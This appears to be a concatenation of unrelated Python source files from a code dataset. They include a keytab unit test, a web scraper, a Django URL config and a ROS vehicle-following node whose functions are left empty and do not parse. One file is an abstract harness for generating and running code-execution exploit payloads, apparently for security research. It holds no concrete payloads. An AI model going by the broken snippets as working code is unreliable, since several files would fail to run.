print(row_format.format(region["id"], region["name"]))
elif args.search:
if args.origin is None or args.region is None or args.distance is None:
parser.error("Search option requires origin, region and distance.")
discord = Discord(args.webhook) if args.webhook is not None else None
blinkee = Blinkee(origin=tuple(args.origin.split(",")), region_id=int(args.region), distance=int(args.distance),
notifier=discord)
blinkee.show()
blinkee.notify()
| 2.625 | 3 |
lib/python/treadmill/tests/keytabs_test.py | krcooke/treadmill | 133 | 12766775 | """Unit test for keytabs
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import unittest
import mock
from treadmill import keytabs
class KeytabsTest(unittest.TestCase):
"""test keytabs function
"""
def setUp(self):
self.spool_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.spool_dir)
def _touch_file(self, name):
with io.open(os.path.join(self.spool_dir, name), 'w'):
pass
@mock.patch('treadmill.subproc.check_call')
def test_add_keytabs_to_file(self, mock_check_call):
"""test add keytabs princ files into dest file
"""
self._touch_file('HTTP#foo@realm')
self._touch_file('HTTP#bar@realm')
self._touch_file('host#foo@realm')
self._touch_file('host#bar@realm')
keytabs.add_keytabs_to_file(self.spool_dir, 'host', 'krb5.keytab')
try:
mock_check_call.assert_called_once_with(
[
'kt_add', 'krb5.keytab',
os.path.join(self.spool_dir, 'host#foo@realm'),
os.path.join(self.spool_dir, 'host#bar@realm'),
]
)
except AssertionError:
# then should called with files in other order
mock_check_call.assert_called_once_with(
[
'kt_add', 'krb5.keytab',
os.path.join(self.spool_dir, 'host#bar@realm'),
os.path.join(self.spool_dir, 'host#foo@realm'),
]
)
if __name__ == '__main__':
unittest.main()
| 2.4375 | 2 |
scrapper.py | macbuse/twitter_bots | 0 | 12766776 | <gh_stars>0
import re
import requests
url = 'https://www.brainyquote.com/topics/problems-quotes'
url = 'https://www.brainyquote.com/topics/science-quotes'
pp = re.compile('<a href="/quotes/(.*?)_\d+.*?>(.*?)</a>',re.DOTALL)
r = requests.get(url)
def clean(x):
author, quote = x
bits = [x[0].upper() + x[1:] for x in author.split('_')]
return ' '.join(bits), html.unescape(quote)
list_of_quotes = [ clean(xx) for xx in pp.findall(r.text)]
| 2.859375 | 3 |
misc/j3.py | dk00/old-stuff | 0 | 12766777 | #!/usr/bin/env python
import sys
import time
print sys.stdin.readline()
time.sleep(3)
exit(99)
| 1.765625 | 2 |
tests/conftest.py | mikedingjan/python-param-store | 10 | 12766778 | <reponame>mikedingjan/python-param-store<gh_stars>1-10
import boto3
def pytest_configure():
boto3.setup_default_session(region_name="eu-west-1")
| 1.53125 | 2 |
catkin_ws/src/vehicle_follow/scripts/following_node.py | championway/DuckietownPi2 | 1 | 12766779 | <reponame>championway/DuckietownPi2
#!/usr/bin/env python
import rospy
import numpy as np
import math
import time
from std_msgs.msg import Bool, Float32
from duckietown_msgs.msg import Twist2DStamped, VehiclePose, AprilTags, BoolStamped
from sensor_msgs.msg import Joy
class Follow(object):
def __init__(self):
self.node_name = rospy.get_name()
self.car_cmd_msg = Twist2DStamped()
self.target_angle = Float32()
self.obstacle_angle = Float32()
#-----Publication-----
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
#-----Subscriptions-----
self.sub_target_pose = rospy.Subscriber("~target_pose", VehiclePose, self.cb_target_pose, queue_size=1)
self.sub_obstacle_pose = rospy.Subscriber("~obstacle_pose", VehiclePose, self.cb_obstacle_pose, queue_size=1)
# safe shutdown
rospy.on_shutdown(self.custom_shutdown)
def cb_target_pose(self, msg):
#subscribe the pose of target(x,y,z,o)
def cb_obstacle_pose(self, msg):
#subscribe the pose of obstacle(x,y,z,o)
def control_vehicle(self, pose):
if obstacle == False:
#Navigate to target, let target_angle=0
else:
#Navigate to the edge of obstacle, let obstacle_angle=0
def stop_vehicle(self):
self.car_cmd_msg.v = 0.0
self.car_cmd_msg.omega = 0.0
self.pub_car_cmd.publish(self.car_cmd_msg)
def custom_shutdown(self):
rospy.loginfo("[%s] Shutting down..." % self.node_name)
# Stop listening
self.sub_target_pose_bumper.unregister()
# Send stop command to car command switch
self.car_cmd_msg.v = 0.0
self.car_cmd_msg.omega = 0.0
self.pub_car_cmd.publish(self.car_cmd_msg)
rospy.sleep(0.5) # To make sure that it gets published.
rospy.loginfo("[%s] Shutdown" % self.node_name)
if __name__ == "__main__":
rospy.init_node("follow_node", anonymous=False)
lane_supervisor_node = Follow()
rospy.spin()
| 2.34375 | 2 |
project/get-project.py | Akaito/codesaru-environ | 1 | 12766780 | """
The MIT License (MIT)
Copyright (c) 2015 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import json
import os
import subprocess
from urllib import request
repo_sources = [
'https://api.github.com/users/Akaito/repos?type=all',
]
class Repo:
@classmethod
def from_github_json(cls, jsn):
r = cls()
r.name = jsn['name']
r.title = r.name[len('codesaru-environ_project_'):]
r.description = jsn['description']
r.clone_url = jsn['clone_url']
return r
def __repr__(self):
return self.title
def find_repos(jsn):
repos = []
for repo_jsn in jsn:
r = Repo.from_github_json(repo_jsn)
if r is None:
continue
if 'codesaru-environ_project_' not in r.name:
continue
repos.append(r)
return repos
def main():
global repo_sources
repos = []
for repo_source_url in repo_sources:
response = request.urlopen(repo_source_url)
response_content = response.read()
repos_jsn = json.loads(response_content.decode())
repos.extend(find_repos(repos_jsn))
# present list of codesaru-environ/project compatible repos
for i in range(len(repos)):
print(i + 1, '--', repos[i].title)
print(' ', repos[i].description)
user_choice = 0
while int(user_choice) < 1 or int(user_choice) > len(repos):
user_choice = input('Enter project number to download: ')
user_choice = int(user_choice) - 1
repo = repos[user_choice]
subprocess.call(['git', 'clone', repo.clone_url, repo.title])
if __name__ == "__main__":
prior_dir = os.getcwd()
main()
os.chdir(prior_dir)
| 2.171875 | 2 |
tests/flatpages_tests/urls.py | ni-ning/django | 61,676 | 12766781 | <gh_stars>1000+
from django.contrib.flatpages.sitemaps import FlatPageSitemap
from django.contrib.sitemaps import views
from django.urls import include, path
urlpatterns = [
path(
'flatpages/sitemap.xml', views.sitemap,
{'sitemaps': {'flatpages': FlatPageSitemap}},
name='django.contrib.sitemaps.views.sitemap'),
path('flatpage_root/', include('django.contrib.flatpages.urls')),
path('accounts/', include('django.contrib.auth.urls')),
]
| 1.382813 | 1 |
netbox/payment/admin.py | cbipoe3ka/new-netbox-2.9 | 0 | 12766782 | from django.contrib import admin
# Register your models here.
from .models import Payment, ContractFile, Company, Contractor
@admin.register(Company)
class Company(admin.ModelAdmin):
list_display = (
'name',
)
@admin.register(Contractor)
class Contractor(admin.ModelAdmin):
list_display = (
'name',
) | 1.742188 | 2 |
0x0B-python-input_output/0-read_file.py | Rmolimock/holbertonschool-higher_level_programming | 1 | 12766783 | <filename>0x0B-python-input_output/0-read_file.py
#!/usr/bin/python3
def read_file(filename=""):
'''open a given file'''
with open(filename, 'r') as f:
print("{}".format(f.read()), end="")
| 3.421875 | 3 |
code_execution/execution_base.py | gbleaney/python_security | 31 | 12766784 | import asyncio
import inspect
import logging
from abc import ABC, abstractclassmethod
from collections import defaultdict
from typing import Callable, Set, Type, Dict, List, Union
from json import JSONEncoder
class Exploit(ABC):
@abstractclassmethod
def generate_payload(command: str) -> Union[str, List[str]]:
pass
@abstractclassmethod
def run_payload(payload: str) -> None:
pass
vulnerable_function: Union[Callable, str] = None
source: str = ""
category_name: str = ""
notes: str = ""
@classmethod
def get_vulnerable_function_fqn(cls):
return (
cls.vulnerable_function
if isinstance(cls.vulnerable_function, str)
else (
cls.vulnerable_function.__module__
+ "."
+ cls.vulnerable_function.__qualname__
)
)
class AsyncEventLoop:
def __enter__(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
return self.loop
def __exit__(self, *args):
self.loop.close()
class ExploitEncoder(JSONEncoder):
def default(self, exploit: Exploit):
if not issubclass(exploit, Exploit):
super().default(exploit)
return {
"vulnerable_function": exploit.get_vulnerable_function_fqn(),
"source": exploit.source,
"category_name": exploit.category_name,
"notes": exploit.notes,
}
def get_exploits_by_category() -> Dict[str, Type[Exploit]]:
exploits_by_category = defaultdict(list)
for exploit in get_exploits():
exploits_by_category[exploit.category_name].append(exploit)
return exploits_by_category
def get_exploit(class_name: str) -> Type[Exploit]:
return next(exploit for exploit in get_exploits() if exploit.__name__ == class_name)
def get_exploits(starting_class: Type[Exploit] = Exploit, exclude_abstract=True) -> Set[Type[Exploit]]:
subclasses = set()
parents_to_process = [starting_class]
while parents_to_process:
parent = parents_to_process.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
parents_to_process.append(child)
if exclude_abstract:
subclasses = set(filter(lambda cls: not inspect.isabstract(cls), subclasses))
return subclasses
| 2.4375 | 2 |
Search.py | ShowLove/GoogleSearchWebcrawler | 0 | 12766785 | import os
from google_search import GoogleCustomSearch
#set variables
os.environ["SEARCH_ENGINE_ID"] = "000839040200690289140:u2lurwk5tko"
os.environ["GOOGLE_CLOUD_API_KEY"] = "<KEY>"
SEARCH_ENGINE_ID = os.environ['SEARCH_ENGINE_ID']
API_KEY = os.environ['GOOGLE_CLOUD_API_KEY']
api = GoogleCustomSearch(SEARCH_ENGINE_ID, API_KEY)
print("we got here\n")
#for result in api.search('prayer', 'https://cse.google.com/cse/publicurl?cx=000839040200690289140:u2lurwk5tko'):
for result in api.search('pdf', 'http://scraperwiki.com'):
print(result['title'])
print(result['link'])
print(result['snippet']) | 2.953125 | 3 |
utils/compute_stock_features.py | nivilo/Chase | 68 | 12766786 | <reponame>nivilo/Chase<filename>utils/compute_stock_features.py
import pandas as pd
SMA_ROLLING_WINDOW = 5
EMA_ALPHA = 0.5
def sma(data: pd.DataFrame, feature):
return data[feature].rolling(SMA_ROLLING_WINDOW).mean()
def daily_returns(data, feature):
return data[feature]/data[feature].shift() - 1
def min_bollinger_band(data: pd.DataFrame, feature):
return data[feature].rolling(SMA_ROLLING_WINDOW).mean() - 2 * data[feature].std()
def max_bollinger_band(data: pd.DataFrame, feature):
return data[feature].rolling(SMA_ROLLING_WINDOW).mean() + 2 * data[feature].std()
def ema(data: pd.DataFrame, feature):
return data[feature].ewm(alpha=EMA_ALPHA).mean()
| 2.859375 | 3 |
advertise/forms/__init__.py | sadagatasgarov1/sahibinden | 2 | 12766787 | from advertise.forms.auth import CustomSignupForm
from advertise.forms.user import UpdateUserForm
| 1.085938 | 1 |
build/cls/tp/tpwt1.py | amunoz1/mines | 1 | 12766788 | # well ties
# @author <NAME>, Colorado School of Mines
# @version 01.21.2014
from dtw import *
from tputils import *
from wtutils import *
from imports import *
# Params:
fp = 35
q = 100
dz = getDz()
# Image warping
dr1 = 0.02 # 2D smoothness vertically
dr2 = 0.50 # 2D smoothness vertically
dr3 = 0.50 # 2D smoothness vertically
r1min,r1max = -0.10,0.10 # vertical constraint # use -0.06,0.12,0.02,0.5,-1.0,1.0
r2min,r2max = -0.50,0.50 # vertical constraint # use -0.06,0.12,0.02,0.5,-1.0,1.0
r3min,r3max = -0.50,0.50 # vertical constraint # use -0.06,0.12,0.02,0.5,-1.0,1.0
smin,smax = -0.100,0.100 # min and max time shifts for 2D/3D warping
propDir = getPropDir()
wset = getLogDataset("d")
phase = 44
def main(args):
global s1,s2,s3
cut1=[0.10,1.25];cut2=[3.40,6.65];cut3=[0.6,2.7];
g,s3,s2,s1,fo = getImage(normalize=True,cut1=cut1,cut2=cut2,cut3=cut3,rnrm=True)
#wells = [3,12,16,15,7,4,2,11]; nm="7" # good wells for 3D
well = 15
uwi = getIDFromDeepSet(well)
goSingleTie(g,uwi,well)
def goSingleTie(g,uwi,well):
wid = str(well)
wt = WellTie(uwi,dz,s1,wset)
wt.makePropagatorSeismogram(propDir,fp,q,phase)
x3 = wt.xf; x2 = wt.yf
gi,ix2,ix3 = getTraces(g,x2,x3)
#wt.findPhase()
wt.computeSingleWellTie(gi,r1min,r1max,smin,smax,dr1)
tz0 = wt.tz0
f = wt.f
sf = wt.sf
sz = wt.sz
tz1 = wt.tz1
h = wt.h
sh = wt.sh
v0 = wt.v
v1 = wt.v1
pv = wt.pv
u = wt.u
php = wt.getPhasePlot()
gi0 = gi[0]
plotCurve(gi0,s1,f,sf,title='untie')
plotCurve(gi0,s1,h,sh,title='tied')
plotCurve(tz0,sz,tz1,sz,title='td-curves')
#plotPhaseRMS(php,len(php),1,paper='phaseplotswt'+wid)
pack = [f,sf,h,sh,u,sz,tz0,tz1,v0,v1,pv,gi,ix2,ix3]
return pack
#########################
# For bug finding only: #
#########################
def goOldShifts(g):
uwi,set = getWellFromSet(well)
ai,x2,x3,z0,v,d,sz = getLogs(uwi,set)
sf,f,tz0 = getPropagatorSeismogram(sz,v,d,q,phase=phase,normalize=True)
gi,ix2,ix3 = getTraces(g,x2,x3)
u,h,sh = getWarpingShiftsOld(sf,s1,f,gi,r1min,r1max,dr1)
tz1,v1,pv = updateTDandVelocity(sz,u,tz0,sf)
gi0 = gi[0]
plotCurve(gi0,s1,f,sf,title='old tie')
plotCurve(gi0,s1,h,sh,title='old tie')
plotCurve(tz0,sz,tz1,sz,title='old tie')
return u,sf,tz1,sz
#------------------------------------------------------------------------------#
class RunMain(Runnable):
def run(self):
main(sys.argv)
SwingUtilities.invokeLater(RunMain())
| 1.875 | 2 |
tfn/tools/loaders/__init__.py | UPEIChemistry/TFN_Layers | 2 | 12766789 | <filename>tfn/tools/loaders/__init__.py
"""
Sub-package containg all loader classes
"""
from .data_loader import DataLoader
from .qm9_loader import QM9DataDataLoader
from .iso17_loader import ISO17DataLoader
from .ts_loader import TSLoader
from .sn2_loader import SN2Loader
from .isom_loader import IsomLoader
| 1.109375 | 1 |
functions.py | StoneMasons4106/sleeper-ffl-discordbot | 1 | 12766790 | # Import needed libraries
import discord
import os
import pymongo
import pendulum
import requests
import re
if os.path.exists("env.py"):
import env
# Define Environment Variables
MONGO_DBNAME = os.environ.get("MONGO_DBNAME")
MONGO_URI = os.environ.get("MONGO_URI")
MONGO_CONN = pymongo.MongoClient(MONGO_URI)
MONGO = pymongo.MongoClient(MONGO_URI)[MONGO_DBNAME]
# Get Existing Server League Object from Mongo
def get_existing_league(message):
existing_league = MONGO.servers.find_one(
{"server": str(message.guild.id)})
MONGO_CONN.close()
return existing_league
# Get Existing Player Object from Mongo
def get_existing_player(first_name, last_name, team_abbreviation):
existing_player = MONGO.players.find_one(
{"name": re.compile(f'{first_name} {last_name}', re.IGNORECASE), "team": re.compile(team_abbreviation, re.IGNORECASE)})
MONGO_CONN.close()
return existing_player
# Get All Server Objects from Mongo
def get_all_servers():
servers = MONGO.servers.find(
{})
MONGO_CONN.close()
return servers
# Set Embed for Discord Bot Responses
def my_embed(title, description, color, name, value, inline, bot):
embed = discord.Embed(title=title, description=description, color=color)
embed.add_field(name=name, value=value, inline=inline)
embed.set_author(name='Sleeper-FFL', icon_url=bot.user.display_avatar)
return embed
# Get Current Week
def get_current_week():
today = pendulum.today(tz='America/New_York')
nfl_state = requests.get(
'https://api.sleeper.app/v1/state/nfl'
)
nfl_date_list = nfl_state.json()["season_start_date"].split("-")
starting_week = pendulum.datetime(int(nfl_date_list[0]), int(nfl_date_list[1]), int(nfl_date_list[2]), tz='America/New_York')
if starting_week.is_future():
future = True
week = 1
else:
future = False
week = today.diff(starting_week).in_weeks() + 1
return week, future
# Check if a Server Has Patron Status
def is_patron(existing_league):
if "patron" in existing_league:
if existing_league["patron"] == "1":
return True
else:
return False
else:
return False
| 2.46875 | 2 |
data_process/setup.py | Fifi-Huo/Digital_Appendix_C | 0 | 12766791 | import os, shutil
from setuptools import setup, find_packages
#
CUR_PATH = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(CUR_PATH, 'build')
if os.path.isdir(path):
print('INFO del dir ', path)
shutil.rmtree(path)
setup(
name = 'pipeline',
# Author details
author='JiejunHuo',
author_email='<EMAIL>',
version = '0.1',
description='Creating MODIS and 2B-CLDCLASS-lidar co-located files (following the earlier work by Zantedeschi et al. (2019))',
packages = find_packages('src','netcdf'),
package_data = {
# include the *.nc in the netcdf folder
'netcdf': ['*.nc'],
},
include_package_data = True,
#exclude_package_data = {'docs':['1.txt']},
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: System :: Logging',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
py_modules=["pipeline"],
install_requires = [
'netCDF4==1.5.1.2',
'scikit-learn==0.20.0',
'scipy==1.1.0',
],
) | 1.75 | 2 |
handlers/postpage.py | caasted/multi-user-blog | 0 | 12766792 | <reponame>caasted/multi-user-blog
import webapp2
import os
import jinja2
import hmac
import hashlib
import random
import string
import time
from google.appengine.ext import db
from models import *
from . import handler
class PostPageHandler(handler.Handler):
def render_post(self, post, content="", error=""):
username = self.check_cookie()
entry = posts.Posts.get_by_id(long(post), parent=None)
query = 'select * from Comments where post_id = :post_id'
comments = db.GqlQuery(query, post_id = long(post))
self.render("post.html", posts=entry, comments=comments,
content=content, error=error, username=username)
def get(self, post):
self.render_post(post)
def post(self, post):
content = self.request.get("content")
error_msg = ""
username = self.check_cookie()
if username and content:
comment = comments.Comments(post_id=long(post), content=content,
author=username)
comment.put()
time.sleep(1) # delay so count includes new post
query = 'select * from Comments where post_id = :post_id'
comment_count = db.GqlQuery(query, post_id = long(post)).count()
entry = posts.Posts.get_by_id(long(post), parent=None)
entry.comments = comment_count
entry.put()
time.sleep(1) # delay so page doesn't load before db updates
self.render_post(post=post)
elif username:
error = "You cannot post blank comments."
self.render_post(post=post, error=error)
else:
self.redirect("/login")
| 2.46875 | 2 |
reports/report_iota_snapshot.py | andrasfe/iota-research | 0 | 12766793 | import matplotlib.pyplot as plt
import pandas as pd
from scipy.interpolate import make_interp_spline, BSpline
import numpy as np
def plot_results(title, csv_name):
df = pd.read_csv('../' + csv_name + '.csv')
ax = plt.gca()
df.columns = ['V', 'E', 'Time']
df = df[['V', 'Time']]
df = pd.DataFrame(df.groupby('V').mean()).reset_index()
print(df.head(5))
df.plot(kind='line',x='V',y='Time', color='blue', ax=ax)
ax.set_xlabel("No. of Transactions")
ax.set_ylabel("Time (ms)")
# ax.set_title("IRI Testing Results")
ax.set_title(title + " implementation Test Results")
df = df.sort_values(by=['V'])
tNew = np.linspace(df['V'].min(), df['V'].max(), 7)
spl = make_interp_spline(df['V'].to_numpy(), df['Time'].to_numpy(), k=3) # type: BSpline
edgesSmooth = spl(tNew)
plt.plot(tNew, edgesSmooth, "r-")
plt.savefig(csv_name + '.jpg', dpi=150, bbox_inches='tight')
# plt.show()
if __name__ == "__main__":
# plot_results('IRI', 'benchmarks.real.iri')
plot_results('Proposed', 'benchmarks.real.ours')
| 3 | 3 |
hackathon/scrapers/adia.py | Addepar/vizceral-example | 0 | 12766794 | <gh_stars>0
from hackathon.scrapers.base import BaseScraper
class AdiaScraper(BaseScraper):
def __init__(self, host_regex):
BaseScraper.__init__(self)
self.__regex = host_regex
def get_good_query_in(self):
return self.__regex + ' AND log_class=*NotificationDataService | parse "fetched [*] GFFs" as gffs | "batu1.prod.addepar.com" as ip | count by ip, _sourceHost'
def get_bad_query_in(self):
return self.__regex + ' AND "Finished processing status" | "batu1.prod.addepar.com" as ip | parse "error=*," as err | sum (err) as _count group ip, _sourceHost'
| 2.53125 | 3 |
oneRing/urls/timeslot.py | TylerRudie/narvi | 1 | 12766795 | <filename>oneRing/urls/timeslot.py
from django.conf.urls import url, include
from oneRing.restInterface.timeSlot.validate_v1 import timeSlot_validate_interface
urlpatterns = [
url(r'^v1/validate/(?P<oneTimeCode>[0-9a-zA-Z_-]+)$',
timeSlot_validate_interface.as_view(),
name= 'timeSlot_validate'
)
] | 1.742188 | 2 |
fastapi_mvc/commands/__init__.py | rszamszur/fastapi-mvc | 98 | 12766796 | """Command design pattern.
The ``fastapi-mvc.commands`` submodule implements command design pattern.
Resources:
1. https://refactoring.guru/design-patterns/command
"""
from fastapi_mvc.commands.base import Command
from fastapi_mvc.commands.invoker import Invoker
from fastapi_mvc.commands.run_generator import RunGenerator
from fastapi_mvc.commands.run_shell import RunShell
| 1.492188 | 1 |
test.py | simonmeister/pytorch-mono-depth | 56 | 12766797 | import argparse
import os
import shutil
import json
import numpy as np
import torch
import torch.nn as nn
import matplotlib.pyplot as plt
from dense_estimation.resnet import resnet50
from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput
from dense_estimation.losses import (BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss,
Log10Loss, DistributionLogLoss)
#from dense_estimation.distributions import GaussianScaleMixture, PowerExponential
from dense_estimation.datasets.nyu_depth_v2 import NYU_Depth_V2
from dense_estimation.data import get_testing_loader
from dense_estimation.app.experiment import get_experiment
from dense_estimation.app.gui import display
from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy
parser = argparse.ArgumentParser(description='testing script')
parser.add_argument('--no_cuda', action='store_true', help='use cpu')
parser.add_argument('--threads', type=int, default=16, help='number of threads for data loader')
parser.add_argument('--seed', type=int, default=123, help='random seed to use')
parser.add_argument('--ex', type=str, default='default',
help='comma separated names of experiments to compare; use name:epoch to specify epoch to load')
parser.add_argument('--gpu', type=str, default='0', help='cuda device to use if using --cuda')
parser.add_argument('--max', type=int, default=20, help='max number of examples to visualize')
parser.add_argument('--samples', type=int, default=1, help='number of monte carlo dropout samples (sampling enabled if > 1)')
opt = parser.parse_args()
cuda = not opt.no_cuda
if cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu
if not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
out_size = (208, 256)
transf_size = (out_size[1], out_size[0])
raw_root = '/home/smeister/datasets'
testing_loader = get_testing_loader(NYU_Depth_V2, raw_root, 1, transf_size,
opt.threads, debug=False)
class BasicDist():
def __init__(self, mean, var):
self.mean = mean
self.variance = var
def _test(ex, epoch):
results = []
with open('./log/{}/opts.txt'.format(ex), 'r') as f:
ex_opt = json.load(f)
if ex_opt['dist'] != '':
dist_map = {
'gsm': (GaussianScaleMixture, lambda: GaussianScaleMixtureOutput(ex_opt['num_gaussians'])),
'exp': (PowerExponential, lambda: PowerExponentialOutput()),
}
distribution, output_unit = dist_map[ex_opt['dist'] ]
model = resnet50(output=output_unit(), fpn=ex_opt['fpn'], dropout_active=False)
visualizer = DistributionVisualizer(distribution)
dropout_active = False
else:
output_unit = None
dropout_active = opt.samples > 1
model = resnet50(fpn=ex_opt['fpn'], dropout_active=dropout_active)
if dropout_active:
distribution = BasicDist
visualizer = DistributionVisualizer(BasicDist)
else:
distribution = None
visualizer = BasicVisualizer()
losses_clses = [RMSLoss(), RelLoss(), Log10Loss()]
#if distribution is not None:
# losses_clses += [DistributionLogLoss(distribution)]
testing_multi_criterion = TestingLosses(losses_clses)
if cuda:
model = model.cuda()
testing_multi_criterion = testing_multi_criterion.cuda()
_, _, restore_path, _ = get_experiment(ex, False, epoch=epoch)
state_dict = torch.load(restore_path)
model.load_state_dict(state_dict)
loss_names = [m.__class__.__name__
for m in testing_multi_criterion.scalar_losses]
losses = np.zeros(len(loss_names))
model.eval()
prob = 0
num = opt.max if opt.max != -1 else len(testing_loader)
averages = []
for i, batch in enumerate(testing_loader):
print(i)
if i > num: break
input = torch.autograd.Variable(batch[0], volatile=True)
target = torch.autograd.Variable(batch[1], volatile=True)
if cuda:
input = input.cuda()
target = target.cuda()
# Predictions are computed at half resolution
upsample = nn.UpsamplingBilinear2d(size=target.size()[2:])
samples = []
if dropout_active:
for _ in range(opt.samples):
sample = model(input)
samples.append(sample)
stacked = torch.cat(samples, dim=1)
mean = torch.mean(stacked, dim=1)
var = torch.var(stacked, dim=1)
output = [mean, var]
else:
output = model(input)
if isinstance(output, list):
output = [upsample(x) for x in output]
cpu_outputs = [x.cpu().data for x in output]
d = distribution(*output)
output = d.mean
if output_unit:
prob += torch.mean(d.prob(target[:, 0:1, :, :])).cpu().data[0]
averages.append(d.averages)
else:
output = upsample(output)
cpu_outputs = [output.cpu().data]
losses += testing_multi_criterion(output, target).cpu().data.numpy()
viz_pt = visualizer(input.cpu().data, cpu_outputs, target.cpu().data)
images = visuals_to_numpy(viz_pt)
results.append(images)
losses /= len(testing_loader)
loss_strings = ["{}: {:.4f}".format(n, l)
for n, l in zip(loss_names, losses)]
print("===> [{}] Testing {}"
.format(ex, ', '.join(loss_strings)))
if output_unit:
averages = torch.squeeze(torch.mean(torch.stack(averages, dim=1), dim=1))
prob /= len(testing_loader)
print("===> [{}] Avg. Likelihood {}".format(ex, prob))
print("===> [{}] Dist. Averages {}"
.format(ex, averages.cpu().data.numpy()))
distribution.plot(averages, label=ex)
return results, visualizer.names
if __name__ == '__main__':
results = []
plt.figure()
for spec in opt.ex.split(','):
splits = spec.split(':')
ex = splits[0]
epoch = int(splits[1]) if len(splits) == 2 else None
result, image_names = _test(ex, epoch)
results.append(result)
plt.legend()
plt.show()
display(results, image_names)
| 2.046875 | 2 |
models/beta/vss.py | YorkSu/hat | 1 | 12766798 | """
VGG-Swish-SE
For Cifar10
本模型默认总参数量[参考基准:cifar10]:
Total params: 16,402,790
Trainable params: 16,390,246
Non-trainable params: 12,544
"""
from hat.models.advance import AdvNet
class vss(AdvNet):
"""
VSS
"""
def args(self):
self.CONV_KI = 'he_normal'
self.CONV_KR = None # l2(0.0005)
self.TIME = [2, 2, 3, 3, 3]
self.CONV = [64, 128, 256, 512, 512]
self.BATCH_SIZE = 128
self.EPOCHS = 384
self.OPT = 'Adam'
def build_model(self):
# params processing
self.CONV_ = list(zip(
self.TIME,
self.CONV,
))
x_in = self.input(self.INPUT_SHAPE)
x = x_in
for ix, i in enumerate(self.CONV_):
if ix: x = self.poolx(x)
x = self.repeat(self.conv_s, *i)(x)
x = self.SE(x)
x = self.GAPool(x)
x = self.local_s(x, 1024)
x = self.dropout(x, 0.3 )
x = self.local_s(x, 1024)
x = self.dropout(x, 0.3 )
x = self.local(x, self.NUM_CLASSES, activation='softmax')
return self.Model(inputs=x_in, outputs=x, name='vss')
def conv_s(self, x_in, filters, kernel_size=3):
x = self.conv(
x_in,
filters,
kernel_size,
kernel_initializer=self.CONV_KI,
kernel_regularizer=self.CONV_KR
)
x = self.bn(x)
x = self.swish(x)
# x = self.SE(x)
return x
def local_s(self, x_in, units):
x = self.local(
x_in,
units,
activation=None,
kernel_initializer=self.CONV_KI,
)
x = self.bn(x)
x = self.swish(x)
return x
def poolx(self, x_in, pool_size=3, strides=2):
maxx = self.maxpool(x_in, pool_size=pool_size, strides=strides)
avgx = self.avgpool(x_in, pool_size=pool_size, strides=strides)
x = self.add([maxx, avgx])
return x
# test part
if __name__ == "__main__":
mod = vss(DATAINFO={'INPUT_SHAPE': (256, 256, 3), 'NUM_CLASSES': 120}, built=True)
mod.summary()
| 2.265625 | 2 |
little_scripts_testing/test_mse_pfbinv.py | dcxSt/pfb-mod | 1 | 12766799 | import sys, os
sys.path.append("..")
import helper as h
from constants import SINC
import numpy as np
import matplotlib.pyplot as plt
eigengrid = h.r_window_to_matrix_eig(SINC) # h.window_pad_to_box_rfft(SINC,pad_factor=10.0)
eigengrid_hann = h.r_window_to_matrix_eig(SINC * np.hanning(len(SINC)))
eigengrid_hamm = h.r_window_to_matrix_eig(SINC * np.hamming(len(SINC)))
plt.imshow(abs(eigengrid),aspect="auto")
plt.show(block=True)
plt.subplots(figsize=(10,5))
plt.subplot(121)
plt.semilogy(np.mean(1/abs(eigengrid**2),axis=1),".",label="SINC")
plt.semilogy(np.mean(1/abs(eigengrid_hann**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.semilogy(np.mean(1/abs(eigengrid_hamm**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("All terms Log Scale")
plt.ylabel("Log R[n]")
plt.xlabel("n")
plt.grid(which="both")
plt.legend()
plt.subplot(122)
plt.plot(np.mean(1/abs(eigengrid[:1000]**2),axis=1),".",label="sinc")
plt.plot(np.mean(1/abs(eigengrid_hann[:1000]**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.plot(np.mean(1/abs(eigengrid_hamm[:1000]**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("First few terms")
plt.ylabel("R[n]")
plt.xlabel("n")
plt.legend()
plt.suptitle("Quantization Error Increase from Inverse PFB",fontsize=18)
plt.tight_layout()
plt.show(block=True)
| 2.25 | 2 |
tilfa.py | jwbensley/pyFRR | 2 | 12766800 |
import networkx as nx
import os
from diagram import Diagram
from spf import spf
class tilfa:
"""This class provides draft-ietf-rtgwg-segment-routing-ti-lfa TI-LFA calculations"""
def __init__(self, debug=0, ep_space=True, trombone=False):
"""
Init the TI-LFA class.
:param int debug: debug level, 0 is disabled.
:param bool ep_space: Consider nodes in EP space not just P-space
